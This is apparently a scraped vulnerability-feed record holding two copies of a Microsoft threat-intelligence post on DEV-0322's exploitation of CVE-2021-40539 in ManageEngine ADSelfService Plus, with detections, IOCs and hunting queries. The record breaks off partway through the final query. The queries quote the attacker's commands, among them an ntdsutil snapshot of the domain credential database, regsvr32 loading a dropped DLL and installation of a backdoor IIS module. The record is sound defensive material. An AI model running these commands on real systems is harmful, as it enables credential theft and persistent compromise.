"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": 
"2021-11-09T18:34:15", "description": "Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.\n\nMSTIC previously highlighted DEV-0322 activity related to [attacks targeting the SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.\n\nOur colleagues at Palo Alto Unit 42 have also highlighted this activity in [their recent blog](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>). We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in [Black Lotus Labs](<https://www.lumen.com/en-us/security/black-lotus-labs.html>) at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.\n\nThis blog shares what Microsoft has observed in the latest DEV-0322 campaign and informs our customers of the protections in place through our security products. We have not observed any exploit of Microsoft products in this activity.\n\nMSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. 
Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## Activity description\n\nMSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.\n\n### Credential dumping\n\nIn this campaign, DEV-0322 was observed performing credential dumping using the following commands:\n\n\n\nDEV-0322 also occasionally deployed a tool to specifically read security event logs and look for Event ID 4624 (successful logon) events. Next, their tool would collect domains, usernames, and IP addresses and write them to the file _elrs.txt_. They typically called this tool _elrs.exe_, and below is an example of how they would call it:\n\n\n\nAfter gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:\n\n\n\n### Installing custom IIS module\n\nThe _gac.exe_ binary installs _ScriptModule.dll_ into the Global Assembly Cache before using _AppCmd.exe_ to install it as an IIS module. _AppCmd.exe_ is a command line tool included in IIS 7+ installations used for server management. This module hooks into the IIS BeginRequest HTTP event and looks for custom commands and arguments passed in the Cookie header of the HTTP request.\n\n\n\n_Figure 1: Encoded request from the controller to the victim machine_\n\nThe custom IIS module supports execution of _cmd.exe_ and PowerShell commands. It also gives DEV-0322 the ability to download and upload files directly to and from a compromised IIS web server. 
The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:\n\n_C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat_\n\nIf this module receives the command \u201cccc,\u201d it drops a file _c:\\windows\\temp\\ccc.exe_. The file _ccc.exe_ is a .NET program that launches _cmd.exe_ with an argument and sends any output back to the controller.\n\n\n\n_Figure 2: The Base64-encoded ccc.exe contained inside the IIS module backdoor_\n\nBelow is an example command launched from the _w3wp.exe_ process after _ccc.exe_ is dropped:\n\n`\"c:\\windows\\temp\\ccc.exe\" dir`\n\n### Deploying Zebracon malware\n\nIn addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.\n\nSubsequent commands are made to _<ZimbraServer>/service/soap_ using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:\n\n * Search email (e.g., _<query>(in:\\"inbox\\" or in:\\"junk\\") is:unread</query>_)\n * Read email\n * Send email (e.g., _Subject: [AutoReply] I've received your mail, I will check it soon!_)\n\nThese operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.\n\nFiles related to the Zebracon Trojan have the following metadata:\n\n * Company name:\n   * Synacor. Inc.\n * File description:\n   * Zimbra Soap Suites\n   * Zimbra Soap Tools\n * Internal name:\n   * newZimbr.dll\n   * zimbra-controller-dll.dll\n * Original filename:\n   * newZimbr.dll\n   * ZIMBRA-SOAP.DLL\n\nMicrosoft will continue to monitor DEV-0322 activity and implement protections for our customers. 
The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Detections\n\n### Microsoft 365 Defender detections\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Trojan:MSIL/Gacker.A!dha\n * Backdoor:MSIL/Kokishell.A!dha\n * Trojan:Win64/Zebracon.A!dha\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * DEV-0322 Actor activity detected\n * Malware from possible exploitation of CVE-2021-40539\n\nThe following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:\n\n * 'Zebracon' high-severity malware was detected\n * Anomaly detected in ASEP registry\n\nMicrosoft 365 Defender correlates any related alerts into [incidents](<https://docs.microsoft.com/microsoft-365/security/defender/investigate-incidents?view=o365-worldwide>) to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.\n\nThe threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. 
Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.\n\n### Microsoft Sentinel detections\n\nThe indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the _Microsoft Emerging Threat Feed_ located in the [Microsoft Sentinel Threat Intelligence blade](<https://docs.microsoft.com/azure/sentinel/understand-threat-intelligence>). These can be used by customers for detection purposes alongside the hunting queries detailed below.\n\n## Advanced hunting queries\n\n### Microsoft Sentinel hunting queries\n\n**Name**: DEV-0322 Command Line Activity November 2021 \n**Description**: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor's post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml>\n\n**Name**: DEV-0322 File Drop Activity November 2021 \n**Description**: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor\u2019s post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. 
Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml>\n\nIn addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:\n\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021-MSIM.yaml>\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021-MSIM.yaml>\n\n### Microsoft 365 Defender hunting queries\n\n**Name:** Surface devices with the CVE-2021-40539 vulnerability \n**Description:** Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA2WQuw6CQBBFT23iP2yoNb4LCyqwsFETjT3iEjQgBlAaP967FkqwmJ27N7NnZjbE8uRCrHyQytlTkFDTEFHKPfIg4yZVyjmpNlPUCkuFoU-PFyPTkH5qrHQgkmXNWdrH1-kRiLRiyJSxYiI1l1owY4n35RjuYhRc9T5WF0PYmtARBx1vo6lyZef_-rrbVrvsNG0kTiJmqTrndzdsE_63dztV6lXoD949nbyNLgEAAA&timeRangeId=week>).\n\n`DeviceTvmSoftwareVulnerabilities \n| where CveId == \"CVE-2021-40539\" \n| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion`\n\n**Name:** Hunt for suspicious dropped files post-exploitation \n**Description:** Look for suspicious files dropped by the threat actor\u2019s post-exploitation activity. 
[Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA41T20rDQBCdZ8F_WPrUQmzelT6U1EKhSlHfVKSm6T1JyUZrwI_3zMmGJlGhLNmZneuZS3zxxchUUpwduCVoBprLWiJQKwfQUDbQbEAN6R4yC34B2xQWarPA-10K55tBMgdncIegGvVSLvAuj0bIW9EGjFhIAp-Y2bryLB0J5FpecGbMtsKt-hHjz6m5o7VqLb4l5CoNICmATbPr-0EeZUhuh4yF9JGtxNgRj3foMh0RL4E2BWcpyeERI5byIU8fki98HXmVntw0qhtB_klMkYxdhbeQRIiaI2Ld9hvfkd3O2PHK_p5VqiQiFktU2ltFGsEmg-yEwrjJjUH3sNd4M9anHmtwVt5wJ5xRt9b5XgOPz42YwC50U7REUW1EBj_LXbGwSB1q7brhO8aZE3E5-5A5LDu6qk1ctXvOyzCDVtnuyxZa9TPIV05kQN8lZ_rBqWSspt7xck-qvOf2vekVNCqZMnvkKky4dyqxbmtiVuvz__g9mR77k7T2YgKfNp4DMWz5x-VyRWTa4YWr8wm-MRHm3I4D97Yetdoa749N8v7ZDu_M6j23F7qFG_qWM236DjlznY72qcr9A2VPOedoBAAA&timeRangeId=week>).\n\n`// Look for the specific files dropped by the threat actor \nlet files = dynamic([\"C:\\\\ProgramData\\\\Microsoft\\\\Crypto\\\\RSA\\\\key.dat\", \"c:\\\\windows\\\\temp\\\\ccc.exe\"]); \nDeviceFileEvents \n| where FileName endswith \"elrs.exe\" or FolderPath has_any (files) \n// Also surface the elrs.exe invocation when it is seen on the same device (raises the risk) \n| join kind=leftouter (DeviceProcessEvents \n| where ProcessCommandLine contains \"cmd /c elrs.exe\") on DeviceId \n| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName`\n\n**Name:** Hunt for command lines observed used by the DEV-0322 actor \n**Description:** Look for suspicious command lines that are used as part of the threat actor's post-exploitation activity. 
[Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA71W72_SUBS9n038H8i-wAyDRM0-zGCic8uIsJixmJg5CbQd1NGCtMBm_OM997xXaaHFitE09N333v31zj33laY0pSIdmeK5h3SHcY7RwRjgGUgoLuYT8SF5EkGeyhCjB70l3rq74FyloTziHcsYczPOIQ0gVfB2MKr_p_IEc_NMsB8zYgAP_UykFn4uPIawDbDuSE1upGp1G9B6YJwmVipyICurpSshIrnYPWEGro1uspxhbYq5RokYe4C4E0pJvh49hpBc6Cww-tSImM0M4xg-NPPPeA6sfx-YJNZ6jgiyYuhwJfFmLDajfUMUnx7X0mtqndBiRY8uoq6sD7ULkIvK6rvBc8bw_Qoo1WFbZYQR9JeQXshzYhOV9rqwlT6Wl_SuKCWei1HcxtFULKlUudgjYrqu8hG0i23Tlj3G9zGLpUseLMiz5ASKa7kcYkprXKtyK4dAN83gd9BfkneefMhgcsYO0cpEGYtmQdcZtsSWwwlm6Y5I-jHbFdqTITHSeqn2CLKpvKKXjv0DvxX7c06LbManmb7v2MgV6A-w2-e6dngtp18Pmce8tM-AZ3WYS5TJVxkTYXdJvQt5D6uurewn_K6BbBc7N_IF71t5hjx6yCuytWvApi0f2WMmozZi-kTW4KsI_YuT7x_n_-CxyQS92Uw22i_f6V_v_gVZW8PJtNfPsTentx40lNEtMi-ExjXGgBnH5OPM2nSI29rC3OYa6aHAKvl6pPupDYzqG2uXtPC4XgZb1XsDnfW50h7Oea9nve5bxXK2-0UsPsGf2vag4-bcR29ZMY_M8yHdkx8Ome3ZO0a_YcqYIe8PXbv7zb-F6Ff9k1vO470-Zm9NyYBNVirnY1qptyubTS-VSyvD0_6WB_Nt-gpd_Sof0UptXZt3HqfzWFvPjb-LkXns_TuW7kYn3uokg07--bIRTvm9iJnPGVeUR4_WQzHjLmzddtvnIfQTp42GkHAKAAA&timeRangeId=week>).\n\n`// Look for command lines observed used by the threat actor \nlet cmd_lines = dynamic(['cmd.exe /c \"wmic /node:redacted process call create \"ntdsutil snapshot \\\\\"activate instance ntds\\\\\" create quit quit > c:\\\\windows\\\\temp\\\\nt.dat\";', 'regsvr32 /s c:\\\\windows\\\\temp\\\\user64.dll', 'process call create \"cmd /c c:\\\\windows\\\\temp\\\\gac.exe -i c:\\\\windows\\\\temp\\\\ScriptModule.dll >c:\\\\windows\\\\temp\\\\tmp.dat\"']); \nDeviceProcessEvents \n// Look for the static command lines, and the dynamic one using a regex \n| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" \n| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, 
ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid \n// Base risk score on number of command lines seen for each host \n| extend RiskScore = count_ \n| project-reorder FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName \n| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName`\n\n## Indicators of compromise (IOCs)\n\nType | Indicator \n---|--- \nSHA-256 | bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5 \nSHA-256 | e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e \nSHA-256 | 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b \nSHA-256 | a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2 \nSHA-256 | d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16 \nSHA-256 | 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090 \nSHA-256 | ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6 \nSHA-256 | b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665 \nSHA-256 | b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710 \nSHA-256 | bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da \nSHA-256 | 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59 \nSHA-256 | f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e \nSHA-256 | 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428 \nSHA-256 | 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058 \nSHA-256 | b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b \n \n \n\nThe post [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": 
{}, "published": "2021-11-09T00:24:55", "type": "mssecure", "title": "Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:24:55", "id": "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "href": "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-11-09T18:22:59", "description": "Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.\n\nMSTIC previously highlighted DEV-0322 activity related to [attacks targeting the SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.\n\nOur colleagues at Palo Alto Unit 42 have also highlighted this activity in [their recent blog](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>). We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. 
We would also like to thank our partners in [Black Lotus Labs](<https://www.lumen.com/en-us/security/black-lotus-labs.html>) at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.\n\nThis blog shares what Microsoft has observed in the latest DEV-0322 campaign and informs our customers of protections in place through our security products. We have not observed any exploit of Microsoft products in this activity.\n\nMSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## Activity description\n\nMSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.\n\n### Credential dumping\n\nIn this campaign, DEV-0322 was observed performing credential dumping using the following commands:\n\n\n\nDEV-0322 also occasionally deployed a tool that reads the Security event log specifically for Event ID 4624 (successful logon) events. Their tool would then collect the domains, usernames, and IP addresses from those events and write them to the file _elrs.txt_. 
They typically called this tool _elrs.exe_, and below is an example of how they would call it:\n\n\n\nAfter gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:\n\n\n\n### Installing custom IIS module\n\nThe _gac.exe_ binary installs _ScriptModule.dll_ into the Global Assembly Cache before using _AppCmd.exe_ to register it as an IIS module. _AppCmd.exe_ is a command line tool included in IIS 7+ installations used for server management. The module hooks the IIS BeginRequest HTTP event and looks for custom commands and arguments passed in the Cookie field of the HTTP header.\n\n\n\n_Figure 1: Encoded request from the controller to the victim machine_\n\nThe custom IIS module supports executing _cmd.exe_ and PowerShell commands. It also lets DEV-0322 download and upload files directly to and from a compromised IIS web server. The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:\n\n_C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat_\n\nIf this module receives the command \u201cccc,\u201d it drops a file _c:\\windows\\temp\\ccc.exe_. The file _ccc.exe_ is a .NET program that launches _cmd.exe_ with an argument and sends any output back to the controller.\n\n\n\n_Figure 2: The Base64-encoded ccc.exe contained inside the IIS module backdoor_\n\nBelow is an example command from the _w3wp.exe_ process after _ccc.exe_ is dropped:\n\n`\"c:\\windows\\temp\\ccc.exe\" dir`\n\n### Deploying Zebracon malware\n\nIn addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. 
This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.\n\nSubsequent commands are made to _<ZimbraServer>/service/soap_ using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:\n\n * Search email (e.g., _<query>(in:\\"inbox\\" or in:\\"junk\\") is:unread</query>_)\n * Read email\n * Send email (e.g., _Subject: [AutoReply] I've received your mail, I will check it soon!_)\n\nThese operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.\n\nFiles related to the Zebracon Trojan have the following metadata:\n\n * Company name:\n   * Synacor. Inc.\n * File description:\n   * Zimbra Soap Suites\n   * Zimbra Soap Tools\n * Internal name:\n   * newZimbr.dll\n   * zimbra-controller-dll.dll\n * Original filename:\n   * newZimbr.dll\n   * ZIMBRA-SOAP.DLL\n\nMicrosoft will continue to monitor DEV-0322 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Detections\n\n### Microsoft 365 Defender detections\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Trojan:MSIL/Gacker.A!dha\n * Backdoor:MSIL/Kokishell.A!dha\n * Trojan:Win64/Zebracon.A!dha\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * DEV-0322 Actor activity detected\n * Malware from possible exploitation of CVE-2021-40539\n\nThe following alerts may also indicate activity associated with this threat. 
These alerts can be triggered by unrelated threat activity, but they are listed here for reference:\n\n * 'Zebracon' high-severity malware was detected\n * Anomaly detected in ASEP registry\n\nMicrosoft 365 Defender correlates any related alerts into [incidents](<https://docs.microsoft.com/microsoft-365/security/defender/investigate-incidents?view=o365-worldwide>) to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.\n\nThe threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.\n\n### Microsoft Sentinel detections\n\nThe indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the _Microsoft Emerging Threat Feed_ located in the [Microsoft Sentinel Threat Intelligence blade](<https://docs.microsoft.com/azure/sentinel/understand-threat-intelligence>). These can be used by customers for detection purposes alongside the hunting queries detailed below.\n\n## Advanced hunting queries\n\n### Microsoft Sentinel hunting queries\n\n**Name**: DEV-0322 Command Line Activity November 2021 \n**Description**: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor's post-exploitation activity. 
The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml>\n\n**Name**: DEV-0322 File Drop Activity November 2021 \n**Description**: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor\u2019s post-exploitation activity. The query likewise uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml>\n\nIn addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:\n\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021-MSIM.yaml>\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021-MSIM.yaml>\n\n### Microsoft 365 Defender hunting queries\n\n**Name:** Surface devices with the CVE-2021-40539 vulnerability \n**Description:** Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. 
[Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA2WQuw6CQBBFT23iP2yoNb4LCyqwsFETjT3iEjQgBlAaP967FkqwmJ27N7NnZjbE8uRCrHyQytlTkFDTEFHKPfIg4yZVyjmpNlPUCkuFoU-PFyPTkH5qrHQgkmXNWdrH1-kRiLRiyJSxYiI1l1owY4n35RjuYhRc9T5WF0PYmtARBx1vo6lyZef_-rrbVrvsNG0kTiJmqTrndzdsE_63dztV6lXoD949nbyNLgEAAA&timeRangeId=week>).\n\n`DeviceTvmSoftwareVulnerabilities \n| where CveId == \"CVE-2021-40539\" \n| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion`\n\n**Name:** Hunt for suspicious dropped files post-exploitation \n**Description:** Look for suspicious files dropped by the threat actor\u2019s post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA41T20rDQBCdZ8F_WPrUQmzelT6U1EKhSlHfVKSm6T1JyUZrwI_3zMmGJlGhLNmZneuZS3zxxchUUpwduCVoBprLWiJQKwfQUDbQbEAN6R4yC34B2xQWarPA-10K55tBMgdncIegGvVSLvAuj0bIW9EGjFhIAp-Y2bryLB0J5FpecGbMtsKt-hHjz6m5o7VqLb4l5CoNICmATbPr-0EeZUhuh4yF9JGtxNgRj3foMh0RL4E2BWcpyeERI5byIU8fki98HXmVntw0qhtB_klMkYxdhbeQRIiaI2Ld9hvfkd3O2PHK_p5VqiQiFktU2ltFGsEmg-yEwrjJjUH3sNd4M9anHmtwVt5wJ5xRt9b5XgOPz42YwC50U7REUW1EBj_LXbGwSB1q7brhO8aZE3E5-5A5LDu6qk1ctXvOyzCDVtnuyxZa9TPIV05kQN8lZ_rBqWSspt7xck-qvOf2vekVNCqZMnvkKky4dyqxbmtiVuvz__g9mR77k7T2YgKfNp4DMWz5x-VyRWTa4YWr8wm-MRHm3I4D97Yetdoa749N8v7ZDu_M6j23F7qFG_qWM236DjlznY72qcr9A2VPOedoBAAA&timeRangeId=week>).\n\n`// Look for the specific files dropped by the threat actor \nlet files = dynamic([\"C:\\\\ProgramData\\\\Microsoft\\\\Crypto\\\\RSA\\\\key.dat\", \"c:\\\\windows\\\\temp\\\\ccc.exe\"]); \nDeviceFileEvents \n| where FileName endswith \"elrs.exe\" or FolderPath has_any (files) \n// Also surface the elrs.exe invocation when it is seen on the same device (raises the risk) \n| join kind=leftouter (DeviceProcessEvents \n| where ProcessCommandLine contains \"cmd /c elrs.exe\") on DeviceId \n| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName`\n\n**Name:** Hunt for command lines observed used by 
the DEV-0322 actor \n**Description:** Look for suspicious command lines that are used as part of the threat actor's post-exploitation activity. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA71W72_SUBS9n038H8i-wAyDRM0-zGCic8uIsJixmJg5CbQd1NGCtMBm_OM997xXaaHFitE09N333v31zj33laY0pSIdmeK5h3SHcY7RwRjgGUgoLuYT8SF5EkGeyhCjB70l3rq74FyloTziHcsYczPOIQ0gVfB2MKr_p_IEc_NMsB8zYgAP_UykFn4uPIawDbDuSE1upGp1G9B6YJwmVipyICurpSshIrnYPWEGro1uspxhbYq5RokYe4C4E0pJvh49hpBc6Cww-tSImM0M4xg-NPPPeA6sfx-YJNZ6jgiyYuhwJfFmLDajfUMUnx7X0mtqndBiRY8uoq6sD7ULkIvK6rvBc8bw_Qoo1WFbZYQR9JeQXshzYhOV9rqwlT6Wl_SuKCWei1HcxtFULKlUudgjYrqu8hG0i23Tlj3G9zGLpUseLMiz5ASKa7kcYkprXKtyK4dAN83gd9BfkneefMhgcsYO0cpEGYtmQdcZtsSWwwlm6Y5I-jHbFdqTITHSeqn2CLKpvKKXjv0DvxX7c06LbManmb7v2MgV6A-w2-e6dngtp18Pmce8tM-AZ3WYS5TJVxkTYXdJvQt5D6uurewn_K6BbBc7N_IF71t5hjx6yCuytWvApi0f2WMmozZi-kTW4KsI_YuT7x_n_-CxyQS92Uw22i_f6V_v_gVZW8PJtNfPsTentx40lNEtMi-ExjXGgBnH5OPM2nSI29rC3OYa6aHAKvl6pPupDYzqG2uXtPC4XgZb1XsDnfW50h7Oea9nve5bxXK2-0UsPsGf2vag4-bcR29ZMY_M8yHdkx8Ome3ZO0a_YcqYIe8PXbv7zb-F6Ff9k1vO470-Zm9NyYBNVirnY1qptyubTS-VSyvD0_6WB_Nt-gpd_Sof0UptXZt3HqfzWFvPjb-LkXns_TuW7kYn3uokg07--bIRTvm9iJnPGVeUR4_WQzHjLmzddtvnIfQTp42GkHAKAAA&timeRangeId=week>).\n\n`// Look for command lines observed used by the threat actor \nlet cmd_lines = dynamic(['cmd.exe /c \"wmic /node:redacted process call create \"ntdsutil snapshot \\\\\"activate instance ntds\\\\\" create quit quit > c:\\\\windows\\\\temp\\\\nt.dat\";', 'regsvr32 /s c:\\\\windows\\\\temp\\\\user64.dll', 'process call create \"cmd /c c:\\\\windows\\\\temp\\\\gac.exe -i c:\\\\windows\\\\temp\\\\ScriptModule.dll >c:\\\\windows\\\\temp\\\\tmp.dat\"']); \nDeviceProcessEvents \n// Look for the static command lines, and the dynamic one using a regex \n| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex \"save 
